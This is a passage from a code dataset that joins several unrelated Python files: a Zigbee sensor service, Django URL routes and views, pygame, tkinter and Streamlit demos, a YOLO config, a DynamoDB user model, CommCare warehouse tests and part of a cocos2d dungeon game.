int(temp)\r\n\tpullreq = parsePacket['Payload']\r\n\tpullreq = (pullreq.decode()).lower()\r\n\tif (pullreq == 'temp'):\r\n\t\tpullrep = bytes([temp])\r\n\t\tprint(\"MY TEMP IS: \", temp)\r\n\telif (pullreq == 'humidity'):\r\n\t\tpullrep = bytes([hum])\r\n\t\tprint(\"MY HUMIDITY IS: \", hum)\r\n\theader = b'\\x01\\x02'+parsePacket['dst'] +parsePacket['src'] + pullrep\r\n\ttemp = header + secret\r\n\tht = MD5.new()\r\n\tht.update(temp)\r\n\tfinal = ht.hexdigest()\r\n\tdata = header + bytes.fromhex(final)\r\n\teol = b'\\r\\n'\r\n\tprint(\"sending(len:\",len(binascii.hexlify(data)),\") :\",binascii.hexlify(data))\r\n\t#time.sleep(4)\t\r\n\tzb.write(data+eol)\r\n\r\n#def PullRep(payload):\r\n\r\n#def DataSend(payload):\r\n\r\n#def DataCollect(payload):\r\n\r\n\r\ndef service(parsePacket, secret):\r\n\tglobal zb\r\n\tservType = parsePacket['Type']\r\n\tpayload = parsePacket['Payload']\r\n\r\n\tif(servType == b'\\x00'):\r\n\t\tPush(payload)\r\n\telif(servType == b'\\x01'):\r\n\t\tPullReq(parsePacket, secret, zb)\r\n\telif(servType == b'\\x02'):\r\n\t\tPullRep(payload)\r\n\telif(servType == b'\\x03'):\r\n\t\tDataSend(payload)\r\n\telif(servType == b'\\x04'):\r\n\t\tDataCollect(payload)\r\n\r\n\treturn None\r\n","sub_path":"zb/clientServ.py","file_name":"clientServ.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451542477","text":"import pygame\r\nimport bluetooth\r\n\r\nSCREENWIDTH = 800\r\nSCREENHEIGHT = 480\r\n\r\nclass bluetoothPiC:\r\n green = (0, 255, 0)\r\n blue = (0, 0, 128)\r\n\r\n def __init__(self, sizeH, sizeW):\r\n self.sizeH = sizeH\r\n self.sizeW = sizeW\r\n\r\n def printSearchDevice(self, screen, posH, posW, width, height):\r\n font = pygame.font.Font('Resources/fonts/OpenSans-Regular.ttf', 10)\r\n text = font.render('GeeksForGeeks\\n\\ntravaillll', True, self.green, self.blue)\r\n textRect = text.get_rect()\r\n textRect.center = (posW, posH)\r\n screen.blit(text, textRect)\r\n\"\"\"\r\nnearby_devices = bluetooth.discover_devices(lookup_names=True)\r\nprint(\"found %d devices\" % len(nearby_devices))\r\n\r\nfor addr, name in nearby_devices:\r\n print(\" %s - %s\" % (addr, name))\r\n\"\"\"\r\n","sub_path":"PiCar/bluetoothPiC.py","file_name":"bluetoothPiC.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157052297","text":"\"\"\"ModelServer URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom rest_framework.schemas import get_schema_view\nfrom rest_framework.documentation import include_docs_urls\n\nAPI_TITLE = 'MR Interior Design Server API'\nAPI_DESCRIPTION = 'A Web API for creating and viewing cloud database.'\nschema_view = get_schema_view(title=API_TITLE)\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^schema/$', schema_view),\n url(r'^docs/', include_docs_urls(title=API_TITLE, description=API_DESCRIPTION,\n authentication_classes=[], permission_classes=[],\n ),\n ),\n url(r'^category/', include('categories.urls')),\n url(r'^asset/', include('assets.urls')),\n url(r'^descriptor/', include('descriptors.urls')),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"ModelServer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596220459","text":"#!/usr/bin/env python\n\nfrom view_matrix import ViewMatrix\nfrom view_schedule import ViewSchedule\n\nimport pygame\nimport threading\nimport time\n\nWIDTH=800\nHEIGHT=480\n\nclass Application:\n def __init__(self):\n self.models = []\n self.views = []\n\n matrix = ViewMatrix()\n self.models.append(matrix)\n self.views.append(matrix)\n\n self.views.append(ViewSchedule())\n\n self.queue_draw = True\n\n def run(self):\n # Initialize the screen\n pygame.init()\n pygame.mouse.set_visible(False)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n\n while True:\n # Monitor for quit events.\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n\n # Allow models to update.\n for model in self.models:\n if model.update():\n self.queue_draw = True\n\n # Trigger a render if any models changed.\n if self.queue_draw:\n self.queue_draw = False\n self.render(screen)\n else:\n time.sleep(0.1)\n\n def render(self, screen):\n surface = pygame.Surface(screen.get_size())\n surface = surface.convert()\n surface.fill((0, 0, 0))\n\n for view in self.views:\n view.render(surface)\n\n screen.blit(surface, (0, 0))\n pygame.display.flip()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218877871","text":"from easydict import EasyDict as edict\nimport os\n\n__C = edict()\ncfg = __C\n\nreal_path = os.path.dirname(os.path.realpath(__file__))\n__C.NCS_GRAPH = os.path.join(real_path, \"graph\")\n__C.MODEL_INPUT_SIZE = (448,448)\n__C.CLASSES = [\"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\",\"tvmonitor\"]\n__C.BOXES_FILTERING_THRESHOLD = 0.2\n__C.IOU_FILTERING_THRESHOLD = 0.5\n__C.NUM_CLASSES = len(__C.CLASSES)\n__C.NUM_BOXES = 2\n__C.GRID_SIZE = 7\n","sub_path":"yolo_config.py","file_name":"yolo_config.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631073220","text":"import os\nimport logging\n\nimport boto3\n\ndynamodb = boto3.resource('dynamodb')\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass User():\n __columns = {'id', 'name', 'timing', 'percent',\n 'area', 'active', 'talk_status', 'message'}\n\n @classmethod\n def find(cls, user_id):\n table = dynamodb.Table(os.environ.get('TABLE_NAME'))\n res = table.get_item(Key={'id': user_id})\n if 'Item' in res:\n if res['Item'].keys() == cls.__columns:\n return User(id=res['Item']['id'],\n name=res['Item']['name'],\n timing=res['Item']['timing'],\n percent=res['Item']['percent'],\n area=res['Item']['area'],\n active=res['Item']['active'],\n talk_status=res['Item']['talk_status'],\n message=res['Item']['message'])\n else:\n raise ValueError\n else:\n return None\n\n def __init__(self, id, name, timing='06:15', percent=40, area='東京',\n active=True, setting_status='Wait', talk_status='Wait',\n message='none'):\n self.id = id\n self.name = name\n self.timing = timing\n self.percent = percent\n self.area = area\n self.active = active\n self.talk_status = talk_status\n self.message = message\n\n def save(self):\n table = dynamodb.Table(os.environ.get('TABLE_NAME'))\n item = {'id': self.id,\n 'name': self.name,\n 'timing': self.timing,\n 'percent': self.percent,\n 'area': self.area,\n 'active': self.active,\n 'talk_status': self.talk_status,\n 'message': self.message}\n table.put_item(Item=item)\n","sub_path":"functions/bot/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290711440","text":"#python 2.7.15\nimport math\n\nx = 26977\n\n#New Class\nclass MathExec:\n def __init__(var1,num1):\n var1.num1 = math.sqrt(num1)\n var1.num2 = num1\n \n def showSqrt(var1):\n print(\"The squareroot of the number is: \" + str(var1.num1))\n\n def isOddorEven(var1):\n if var1.num2%2 == 0:\n print(str(var1.num2) + \" is Even.\")\n else:\n print(str(var1.num2) +\" is Odd.\")\n\n#New Functions\ndef extractSQR(num):\n return math.sqrt(num)\n\ndef OddOrEven(num):\n mod = num%2\n if mod==0:\n print(str(num) + \" is Even\")\n else:\n print(str(num) + \"is Odd\")\n\n#Exec Main Body\n\n # Executing using Call Function\nprint(\"The squareroot of the number is: \" + str(extractSQR(x)))\nOddOrEven(x)\n\nprint(\"----------------------------------\")\n\n # Executing using Instantation\nz = MathExec(x)\nz.showSqrt()\nz.isOddorEven()","sub_path":"pyByCallingFunction.py","file_name":"pyByCallingFunction.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608203822","text":"# encoding: utf-8\nimport os\nfrom os.path import *\n\n# ---------- Feel Free To Change This Block -----------------\n\nCITY_CH2PY = {\n\t'无锡': 'wuxi',\n\t'武汉': 'wuhan',\n\t'北京': '',\n\t'成都': 'cd',\n\t'大连': 'dl',\n\t'东莞': 'dg',\n\t'佛山': 'fs',\n\t'福州': 'fz',\n\t'广州': 'gz',\n\t'杭州': 'hz',\n\t'合肥': 'hf',\n\t'南昌': 'nc',\n\t'南京': 'nanjing',\n\t'宁波': 'nb',\n\t'青岛': 'qd',\n \t'厦门': 'xm',\n\t'上海': 'sh',\n\t'深圳': 'sz',\n\t'沈阳': 'sy',\n\t'苏州': 'suzhou',\n\t'天津': 'tj',\n\t'西安': 'xian',\n\t'长春': 'changchun',\n\t'长沙': 'cs',\n\t'郑州': 'zz',\n\t'重庆': 'cq'\n}\n\nYEAR = 2016\nMONTH = 7\n\nFIELDS = [\n\t'开盘时间',\n\t'项目名称',\n\t'建筑面积',\n\t'开发商',\n\t'物业管理公司'\n]\n\nTIMEOUT = 20\n\n\n# ---------- Try not to touch this -----------------\n\n# PATH\nSRC_DIR = dirname(abspath(__file__))\nPRJ_DIR = dirname(SRC_DIR)\nCACHE_DIR = join(PRJ_DIR, 'cache')\nRESULT_DIR = join(PRJ_DIR, 'result')\n\n\ndef create_dir(dirpath):\n\tif not isdir(dirpath):\n\t\tos.mkdir(dirpath)\n\t\t\ncreate_dir(CACHE_DIR)\ncreate_dir(RESULT_DIR)","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36190944","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom datetime import datetime, timedelta\n\nfrom corehq.apps.users.util import SYSTEM_USER_ID, DEMO_USER_ID\nfrom corehq.apps.commtrack.const import COMMTRACK_USERNAME\nfrom corehq.pillows.utils import (\n SYSTEM_USER_TYPE,\n DEMO_USER_TYPE,\n COMMCARE_SUPPLY_USER_TYPE,\n WEB_USER_TYPE,\n MOBILE_USER_TYPE,\n)\nfrom corehq.warehouse.models import ApplicationDim\nfrom corehq.warehouse.models import ApplicationStagingTable\nfrom corehq.warehouse.tests.utils import (\n create_user_staging_record,\n create_location_records_from_tree,\n create_location_staging_record,\n create_group_staging_record,\n create_batch,\n BaseWarehouseTestCase, create_application_staging_record)\nfrom corehq.warehouse.models import (\n Batch,\n UserStagingTable,\n UserDim,\n GroupStagingTable,\n GroupDim,\n UserGroupDim,\n LocationDim,\n LocationStagingTable,\n DomainMembershipDim\n)\n\n\ndef teardown_module():\n Batch.objects.all().delete()\n\n\nclass TestUserDim(BaseWarehouseTestCase):\n\n domain = 'user-dim-test'\n slug = 'user_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestUserDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n cls.records = [\n create_user_staging_record(\n cls.domain,\n user_id=SYSTEM_USER_ID,\n username='system_bob',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n cls.domain,\n user_id=DEMO_USER_ID,\n username='demo_sally',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n cls.domain,\n user_id=COMMTRACK_USERNAME,\n username='commtrack_billy',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n None,\n user_id='beeboobop',\n username='web',\n doc_type='WebUser',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n cls.domain,\n user_id='greengoblin',\n username='mobile',\n batch_id=cls.batch.id\n ),\n ]\n\n @classmethod\n def tearDownClass(cls):\n for record in cls.records:\n record.delete()\n UserDim.clear_records()\n UserStagingTable.clear_records()\n super(TestUserDim, cls).tearDownClass()\n\n def test_user_types(self):\n UserDim.commit(self.batch)\n\n self.assertEqual(UserDim.objects.count(), 5)\n self.assertEqual(\n UserDim.objects.filter(user_type=SYSTEM_USER_TYPE).first().user_id,\n SYSTEM_USER_ID,\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=DEMO_USER_TYPE).first().user_id,\n DEMO_USER_ID,\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=COMMCARE_SUPPLY_USER_TYPE).first().user_id,\n COMMTRACK_USERNAME,\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=MOBILE_USER_TYPE).first().user_id,\n 'greengoblin',\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=WEB_USER_TYPE).first().user_id,\n 'beeboobop',\n )\n\n\nclass TestDomainMembershipDim(BaseWarehouseTestCase):\n slug = DomainMembershipDim.slug\n\n @classmethod\n def setUpClass(cls):\n super(TestDomainMembershipDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n cls.bootstrap_user_staging()\n\n @classmethod\n def bootstrap_user_staging(cls):\n create_user_staging_record(\n domain='test1',\n user_id='u1',\n username='mobile1',\n doc_type='CommCareUser',\n batch_id=cls.batch.id,\n )\n create_user_staging_record(\n domain='test1',\n user_id='u2',\n username='mobile2',\n doc_type='CommCareUser',\n batch_id=cls.batch.id,\n )\n create_user_staging_record(\n domain=None,\n username='mobile1',\n user_id='u3',\n doc_type='WebUser',\n batch_id=cls.batch.id,\n domain_memberships=[\n {'domain': 'test1', 'is_admin': True},\n {'domain': 'test2', 'is_admin': False},\n ]\n )\n UserDim.commit(cls.batch)\n\n @classmethod\n def tearDownClass(cls):\n DomainMembershipDim.clear_records()\n UserDim.clear_records()\n UserStagingTable.clear_records()\n super(TestDomainMembershipDim, cls).tearDownClass()\n\n def test_insert_and_update(self):\n DomainMembershipDim.commit(self.batch)\n # should create 4 domain membership columns\n self.assertEqual(\n DomainMembershipDim.objects.count(), 4\n )\n # 'u3' user should have 2 membership columns for each of the domain\n dim_id_of_user3 = UserDim.objects.filter(user_id='u3')[0].id\n self.assertEqual(\n DomainMembershipDim.objects.filter(user_dim_id=dim_id_of_user3).count(),\n 2\n )\n\n ## test removing a domain membership\n # clear and add new staging record to remove a membership of 2\n UserStagingTable.clear_records()\n create_user_staging_record(\n domain=None,\n username='mobile1',\n user_id='u3',\n doc_type='WebUser',\n batch_id=self.batch.id,\n domain_memberships=[\n {'domain': 'test1', 'is_admin': True},\n ]\n )\n DomainMembershipDim.commit(self.batch)\n # should create 3 domain membership columns instead of 4\n self.assertEqual(\n DomainMembershipDim.objects.count(), 3\n )\n # u3 user should have only 1 domain-membership\n dim_id_of_user3 = UserDim.objects.filter(user_id='u3')[0].id\n self.assertEqual(\n DomainMembershipDim.objects.filter(user_dim_id=dim_id_of_user3).count(),\n 1\n )\n\n\nclass TestUserGroupDim(BaseWarehouseTestCase):\n\n domain = 'user-group-dim-test'\n slug = 'user_group_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestUserGroupDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n cls.blue_dog = create_user_staging_record(cls.domain,\n username='blue-dog',\n batch_id=cls.batch.id)\n cls.black_dog = create_user_staging_record(cls.domain,\n username='black-dog',\n batch_id=cls.batch.id)\n cls.yellow_cat = create_user_staging_record(cls.domain,\n username='yellow-cat',\n batch_id=cls.batch.id)\n\n @classmethod\n def tearDownClass(cls):\n GroupStagingTable.clear_records()\n UserStagingTable.clear_records()\n GroupDim.clear_records()\n UserDim.clear_records()\n UserGroupDim.clear_records()\n super(TestUserGroupDim, cls).tearDownClass()\n\n def test_basic_user_group_insert(self):\n UserDim.commit(self.batch)\n self.assertEqual(UserDim.objects.count(), 3)\n\n # Setup group records to have multiple users\n dogs = create_group_staging_record(\n self.domain,\n 'dogs',\n user_ids=[self.blue_dog.user_id, self.black_dog.user_id],\n batch_id=self.batch.id\n )\n create_group_staging_record(\n self.domain,\n 'cats',\n user_ids=[self.yellow_cat.user_id],\n batch_id=self.batch.id\n )\n GroupDim.commit(self.batch)\n self.assertEqual(GroupDim.objects.count(), 2)\n\n UserGroupDim.commit(self.batch)\n self.assertEqual(UserGroupDim.objects.count(), 3)\n dog_relations = UserGroupDim.objects.filter(group_dim=GroupDim.objects.get(group_id=dogs.group_id))\n self.assertEqual(\n dog_relations.count(),\n 2,\n )\n self.assertEqual(\n set(dog_relations.values_list('user_dim_id', flat=True)),\n set(UserDim.objects.filter(\n user_id__in=[self.blue_dog.user_id, self.black_dog.user_id]\n ).values_list('id', flat=True)),\n )\n\n\nclass TestLocationDim(BaseWarehouseTestCase):\n\n domain = 'location-dim-test'\n slug = 'location_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestLocationDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n\n def tearDown(self):\n LocationStagingTable.clear_records()\n LocationDim.clear_records()\n super(TestLocationDim, self).tearDown()\n\n def test_location_dim(self):\n tree = {\n ('Illinois', 'state'): {\n ('Naperville', 'city'): {\n ('Home', 'home'): {}\n },\n ('Chicago', 'city'): {},\n }\n }\n create_location_records_from_tree(self.domain, tree, self.batch.id)\n\n self.assertEqual(LocationStagingTable.objects.count(), 4)\n\n LocationDim.commit(self.batch)\n self.assertEqual(LocationDim.objects.count(), 4)\n home_location = LocationDim.objects.filter(name='Home').first()\n\n self.assertEqual(\n home_location.location_level_0,\n LocationDim.objects.filter(name='Illinois').first().sql_location_id,\n )\n self.assertEqual(\n home_location.location_level_1,\n LocationDim.objects.filter(name='Naperville').first().sql_location_id,\n )\n self.assertEqual(home_location.location_level_2, home_location.sql_location_id)\n self.assertEqual(home_location.location_level_3, None)\n self.assertEqual(home_location.location_level_4, None)\n self.assertEqual(home_location.location_level_5, None)\n self.assertEqual(home_location.location_level_6, None)\n self.assertEqual(home_location.location_level_7, None)\n\n self.assertEqual(home_location.level, 2)\n self.assertEqual(home_location.location_type_name, 'home')\n self.assertEqual(home_location.location_type_code, 'home')\n\n root_location = LocationDim.objects.filter(name='Illinois').first()\n self.assertEqual(root_location.location_level_0, root_location.sql_location_id)\n self.assertEqual(root_location.level, 0)\n\n def test_location_dim_update(self):\n tree = {\n ('Illinois', 'state'): {\n ('Naperville', 'city'): {\n ('Home', 'home'): {}\n },\n ('Chicago', 'city'): {},\n }\n }\n create_location_records_from_tree(self.domain, tree, self.batch.id)\n LocationDim.commit(self.batch)\n self.assertEqual(LocationDim.objects.count(), 4)\n\n # Let's add one more location under Naperville to ensure that the dim updates\n # when it's not a root node\n LocationStagingTable.clear_records()\n home_location = LocationDim.objects.filter(name='Home').first()\n city_location = LocationDim.objects.filter(name='Naperville').first()\n create_location_staging_record(\n self.domain,\n 'Other home',\n sql_location_id=10,\n # Give it the same parent as the Home location\n sql_parent_location_id=city_location.sql_location_id,\n location_type_id=home_location.location_type_id,\n batch_id=self.batch.id\n )\n\n LocationDim.commit(self.batch)\n self.assertEqual(LocationDim.objects.count(), 5)\n\n\nclass TestAppDim(BaseWarehouseTestCase):\n\n domain = 'app-dim-test'\n slug = 'app_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestAppDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n\n @classmethod\n def tearDownClass(cls):\n ApplicationDim.clear_records()\n ApplicationStagingTable.clear_records()\n super(TestAppDim, cls).tearDownClass()\n\n def test_app_dim(self):\n create_application_staging_record(self.domain, 'test-app', batch_id=self.batch.id)\n create_application_staging_record(self.domain, 'test-deleted', doc_type='Application-Deleted', batch_id=self.batch.id)\n ApplicationDim.commit(self.batch)\n self.assertEqual(ApplicationDim.objects.count(), 2)\n test_app = ApplicationDim.objects.get(name='test-app')\n self.assertEqual(test_app.deleted, False)\n deleted_app = ApplicationDim.objects.get(name='test-deleted')\n self.assertEqual(deleted_app.deleted, True)\n","sub_path":"corehq/warehouse/tests/test_dimensions.py","file_name":"test_dimensions.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"35506860","text":"from django.shortcuts import render\r\n\r\nfrom .forms import ContatoForm, LoginForm\r\n\r\n# Create your views here.\r\ndef home(request):\r\n context = {\r\n \"titulo\":\"Outro Título\",\r\n }\r\n return render(request, \"index.html\", context)\r\n\r\ndef contato(request):\r\n context = {}\r\n\r\n if request.POST:\r\n form = ContatoForm(request.POST)\r\n if form.is_valid():\r\n context[\"mensagem\"] = \"Mensagem enviada com sucesso\"\r\n else:\r\n context[\"mensagem\"] = \"Problemas ao enviar a mensagem\"\r\n else:\r\n form = ContatoForm()\r\n #context[\"mensagem\"] = \"Foi um GET\"\r\n\r\n context[\"form\"] = form\r\n return render(request, \"contato.html\", context)\r\n\r\ndef entrar(request):\r\n context = {}\r\n\r\n if request.POST:\r\n form = LoginForm(request.POST)\r\n \r\n if form.is_valid():\r\n context[\"mensagem\"] = \"Login realizado com sucesso\"\r\n else:\r\n context[\"mensagem\"] = \"Erro ao logar\"\r\n else:\r\n form = LoginForm()\r\n #context[\"mensagem\"] = \"Foi um GET\"\r\n\r\n context[\"form\"] = form\r\n return render(request, \"entrar.html\", context)","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404787606","text":"#Подключаем библиотеки\nfrom tkinter import *\nimport tkinter.messagebox as box\n\n#Создаем окно\nwindow = Tk()\nwindow.title('radio')\n#Создаем область окна\nframe = Frame(window)\n\n#Создаем переменную для хранения информации значения переключателя\nbook = StringVar()\n\n#Создаем переключатели\nradio_1 = Radiobutton(frame, text = 'HTML5', variable = book, value='Book HTML5')\nradio_2 = Radiobutton(frame, text = 'CSS', variable = book, value='Book CSS')\nradio_3 = Radiobutton(frame, text = 'JS', variable = book, value='Book js')\nradio_4 = Radiobutton(frame, text = 'C++', variable = book, value='Book C++')\n\n#Активируем переключатель\nradio_1.select()\n\n#создаем функцию для кнопки\ndef dialog():\n #Выводит в окно собщения\n box.showinfo('Selection', 'Choice '+book.get())\n\n#создаем кнопушку\nbtn = Button(frame, text='Choice', command = dialog)\n\n#параметры размещения\nbtn.pack(side=RIGHT, padx = 5)\n\nradio_1.pack(side = LEFT)\nradio_2.pack(side = LEFT)\nradio_3.pack(side = LEFT)\nradio_4.pack(side = LEFT)\n\nframe.pack(padx = 30, pady = 30)\n\n#задаем обновление окна\nwindow.mainloop()","sub_path":"radiob.py","file_name":"radiob.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90896061","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\nimport math\r\nimport source.title_1 as head\r\ndef cuboid_1():\r\n head.title()\r\n st.markdown(\"

Problem Statement: Application to find the Surface Area and Volume of the Cuboid

\", unsafe_allow_html=True)\r\n st.markdown(\"
\",unsafe_allow_html=True)\r\n w1,col1,col2,w2=st.columns((1,2,2,1))\r\n us1,bc1,bc2,us2=st.columns((4,3,3,6))\r\n with col1:\r\n st.markdown(\"\")\r\n st.write(\"# Enter the length \")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the Breadth \")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the Height \")\r\n st.markdown(\"### \")\r\n st.write(\"# Select\")\r\n # ------------to create the function to clear the input-----------#\r\n with bc2:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n def clear_text():\r\n st.session_state[\"Clear_Square\"] = 0\r\n st.session_state[\"Clear_breadth\"] = 0\r\n st.session_state[\"Clear_Height\"] = 0\r\n st.session_state[\"cubiod_selectbox\"] = \"Surface Area\"\r\n st.button(\"Clear\", on_click=clear_text) \r\n with col2:\r\n vAR_input_length=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_length\") \r\n vAR_input_breadth=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_breadth\")\r\n vAR_input_Height=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_Height\") \r\n selected = st.selectbox(\"\",\r\n [\"Surface Area\",\"Volume\",\"Space diagonal\"],key=\"cubiod_selectbox\")\r\n\r\n \r\n #-----cuboid-------#\r\n with bc1:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n if st.button(\"Submit\"):\r\n with col2:\r\n if vAR_input_breadth and vAR_input_Height and vAR_input_length !=0:\r\n if selected == 'Surface Area':\r\n vAR_Surface_area = 2 * ( vAR_input_length * vAR_input_breadth + vAR_input_breadth * vAR_input_Height + vAR_input_Height * vAR_input_length)\r\n vAR_Surface_area = round(vAR_Surface_area,2)\r\n st.success(vAR_Surface_area)\r\n elif selected == \"Volume\": \r\n vAR_Volume = (vAR_input_length * vAR_input_breadth * vAR_input_Height)\r\n vAR_Volume = round(vAR_Volume,2)\r\n st.success(vAR_Volume)\r\n elif selected == \"Space diagonal\": \r\n vAR_Space_diagonal = math.sqrt(vAR_input_length**2 + vAR_input_breadth**2 + vAR_input_Height**2)\r\n vAR_Space_diagonal = round(vAR_Space_diagonal,2)\r\n st.success(vAR_Space_diagonal) \r\n else:\r\n st.error(\"Error\")\r\n with col1:\r\n st.write(\"# Result \")\r\n","sub_path":"Streamlitapp/Grade-09/source/Cuboid.py","file_name":"Cuboid.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327393808","text":"#\n# Write in python 3.4\n#\n\nimport cocos\nimport pyglet\n\nfrom pyglet.gl import *\n\nfrom run_game import game_update, on_pickup_grabbed\nfrom run_game import on_key_press as game_on_key_press\nfrom maze import Maze\nfrom data import TILE_SIZE, SCREEN_SIZE, SCALE_FACTOR, ACTION_TIME\n\nGROUND_IMAGE_PATH = r'assets/ground.png'\nOBSTACLE_IMAGE_PATH = r'assets/obstacle.png'\nGOAL_IMAGE_PATH = r'assets/goal.png'\n\nGROUND = 'ground'\nOBSTACLE = 'obstacle'\nMONSTER = 'monster'\nGOAL = 'goal'\n\nMONSTER_IDLE = 0.95\n\n\nclass Direction(object):\n north = (0, 1)\n south = (0, -1)\n east = (1, 0)\n west = (-1, 0)\n\nHERO_IMAGES_PATHS = {\n Direction.north: r'assets/hero_n.png',\n Direction.south: r'assets/hero_s.png',\n Direction.east: r'assets/hero_e.png',\n Direction.west: r'assets/hero_w.png'}\n\nclass Pickup(cocos.sprite.Sprite):\n\n def __init__(self, image_path, pickup_type=0):\n super().__init__(\n pyglet.image.load(image_path), (0, 0), anchor=(TILE_SIZE[0]/2, -TILE_SIZE[1] / 3))\n self.dungeon = None\n self.position = (0, 0)\n self.dungeon_position = (0, 0)\n self.pickup_type = pickup_type\n\n def grab(self):\n on_pickup_grabbed(self, self.dungeon.hero, self.dungeon.monsters)\n\nclass Monster(cocos.sprite.Sprite):\n\n def __init__(self, image_path):\n super().__init__(\n pyglet.image.load(image_path), (0, 0), anchor=(TILE_SIZE[0]/2, -TILE_SIZE[1] / 3))\n self.dungeon = None\n self.__action = None\n self.__actions = []\n self.__current_action = None\n self.position = (0, 0)\n self.dungeon_position = (0, 0)\n\n self.new_action = None\n\n self.hp = 10\n self.damage = 0\n\n def killed(self):\n for index, monster in enumerate(self.dungeon.monsters):\n if self == monster:\n self.dungeon.monsters[index].kill()\n del self.dungeon.monsters_position[index]\n del self.dungeon.monsters[index]\n\n def __move(self, move):\n new_position = self.dungeon_position[0] + move[0], self.dungeon_position[1] + move[1]\n if self.dungeon.is_tile_free_monster(new_position):\n if new_position != self.dungeon.hero_position:\n move_by = TILE_SIZE[0] * move[0], TILE_SIZE[1] * move[1]\n action = cocos.actions.MoveBy(move_by, ACTION_TIME)\n self.new_action = action\n self.dungeon_position = \\\n new_position\n self.dungeon.update_monster_position()\n\n def get_free_direction(self):\n directions = [Direction.north, Direction.south, Direction.west, Direction.east]\n free = []\n\n for direction in directions:\n position = \\\n self.dungeon_position[0] + direction[0], self.dungeon_position[1] + direction[1]\n if self.dungeon.is_tile_free_monster(position):\n if position != self.dungeon.hero_position and position not in self.dungeon.pickups_position:\n free.append(direction)\n return free\n\n def is_tile_free(self, direction_name):\n direction = None\n if direction_name.lower() == \"up\":\n direction = Direction.north\n elif direction_name.lower() == \"down\":\n direction = Direction.south\n elif direction_name.lower() == \"left\":\n direction = Direction.west\n elif direction_name.lower() == \"right\":\n direction = Direction.east\n position = self.dungeon_position[0] + direction[0], self.dungeon_position[1] + direction[1]\n return self.dungeon.is_tile_free_monster(position) and position != self.dungeon.hero_position and position not in self.dungeon.pickups_position\n\n def move_in_direction(self, direction):\n self.__move(direction)\n\n def up(self):\n self.__move(Direction.north)\n\n def down(self):\n self.__move(Direction.south)\n\n def left(self):\n 